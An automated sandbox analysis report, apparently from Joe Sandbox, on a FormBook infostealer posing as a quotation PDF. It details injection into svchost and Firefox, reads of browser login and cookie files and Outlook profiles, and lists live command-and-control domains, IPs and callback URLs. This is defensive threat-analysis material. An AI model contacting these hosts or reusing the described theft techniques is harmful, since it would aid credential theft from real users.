                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_isv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: NULL target: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: NULL target: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeThread register set: target process: 2324Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeThread APC queued: target process: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3030008Jump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00436CD7 LogonUserW,2_2_00436CD7
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_0040D590
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,2_2_0043333C
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeProcess created: C:\Windows\SysWOW64\RMActivate_isv.exe "C:\Windows\SysWOW64\RMActivate_isv.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00446124
                Source: Quotation request -30112024_pdf.exe, xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: xvYhLzczmazJ.exe, 0000000A.00000002.3133483615.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000000.1561964571.0000000001A71000.00000002.00000001.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723459280.0000000001421000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: Quotation request -30112024_pdf.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,2_2_004720DB
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00472C3F GetUserNameW,2_2_00472C3F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,2_2_0041E364
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,2_2_0040E500

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Quotation request -30112024_pdf.exeBinary or memory string: WIN_XP
                Source: Quotation request -30112024_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: Quotation request -30112024_pdf.exeBinary or memory string: WIN_XPe
                Source: Quotation request -30112024_pdf.exeBinary or memory string: WIN_VISTA
                Source: Quotation request -30112024_pdf.exeBinary or memory string: WIN_7
                Source: Quotation request -30112024_pdf.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS16
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials3
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557571 Sample: Quotation request -30112024... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 28 www.tals.xyz 2->28 30 www.egyshare.xyz 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 Quotation request -30112024_pdf.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 xvYhLzczmazJ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RMActivate_isv.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 xvYhLzczmazJ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.ytsd88.top 47.76.213.197, 53115, 80 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 22->34 36 www.startvin.top 203.161.46.205, 53173, 53174, 53175 VNPT-AS-VNVNPTCorpVN Malaysia 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Quotation request -30112024_pdf.exe63%ReversingLabsWin32.Trojan.AutoitInject
                Quotation request -30112024_pdf.exe100%AviraHEUR/AGEN.1321703
                Quotation request -30112024_pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.egyshare.xyz/lu7u/0%Avira URL Cloudsafe
                http://www.cssa.auction/g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh0%Avira URL Cloudsafe
                http://www.mdpc7.top0%Avira URL Cloudsafe
                http://www.tals.xyz/010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh0%Avira URL Cloudsafe
                http://www.tals.xyz/010v/0%Avira URL Cloudsafe
                http://www.cssa.auction/g4fs/0%Avira URL Cloudsafe
                http://www.ytsd88.top/yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh0%Avira URL Cloudsafe
                http://www.startvin.top/chrv/0%Avira URL Cloudsafe
                http://www.egyshare.xyz/lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze0%Avira URL Cloudsafe
                https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
                http://www.mdpc7.top/55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh0%Avira URL Cloudsafe
                http://www.bionanosolutions.info/i6zb/0%Avira URL Cloudsafe
                http://www.mdpc7.top/55tt/0%Avira URL Cloudsafe
                http://www.bionanosolutions.info/i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh0%Avira URL Cloudsafe
                http://www.acc888ommodate.xyz/aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf0%Avira URL Cloudsafe
                http://www.070002018.xyz/zffa/0%Avira URL Cloudsafe
                http://www.startvin.top/chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of0%Avira URL Cloudsafe
                http://www.acc888ommodate.xyz/aqil/0%Avira URL Cloudsafe
                http://www.070002018.xyz/zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.bionanosolutions.info
                		176.117.73.104
                		truetrue
                  		unknown
                  www.070002018.xyz
                  		161.97.142.144
                  		truetrue
                    		unknown
                    www.startvin.top
                    		203.161.46.205
                    		truetrue
                      		unknown
                      www.tals.xyz
                      		13.248.169.48
                      		truetrue
                        		unknown
                        mmd.dnsmmd.com
                        		20.2.36.112
                        		truetrue
                          		unknown
                          www.ytsd88.top
                          		47.76.213.197
                          		truetrue
                            		unknown
                            www.acc888ommodate.xyz
                            		176.32.38.130
                            		truetrue
                              		unknown
                              cssa.auction
                              		107.167.84.42
                              		truetrue
                                		unknown
                                www.egyshare.xyz
                                		13.248.169.48
                                		truetrue
                                  		unknown
                                  phoenix88.sbs
                                  		88.99.61.52
                                  		truefalse
                                    		unknown
                                    www.mdpc7.top
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      15.164.165.52.in-addr.arpa
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.cssa.auction
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.phoenix88.sbs
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.uynline.shop
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.egyshare.xyz/lu7u/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ytsd88.top/yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tals.xyz/010v/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cssa.auction/g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tals.xyz/010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.egyshare.xyz/lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2zetrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cssa.auction/g4fs/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.startvin.top/chrv/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bionanosolutions.info/i6zb/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.startvin.top/chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/oftrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.070002018.xyz/zffa/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mdpc7.top/55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mdpc7.top/55tt/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.acc888ommodate.xyz/aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqftrue
                                              • Avira URL Cloud: safe
                                              		unknown
